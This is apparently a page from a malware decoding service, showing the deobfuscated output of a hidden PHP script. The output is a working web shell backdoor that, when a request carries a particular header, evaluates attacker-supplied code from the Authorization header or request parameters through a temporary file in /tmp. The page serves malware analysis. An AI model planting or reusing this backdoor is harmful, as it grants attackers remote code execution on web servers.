Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


$_HEADERS = getallheaders();
if (isset($_HEADERS['Sec-Websocket-Accept'])) {
    $c = "@eval($_HEADERS["Authorization\"]);@eval($_REQUEST["Authorization"]);";
    $f = '/tmp/.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}


© 2021 Quttera Ltd. All rights reserved.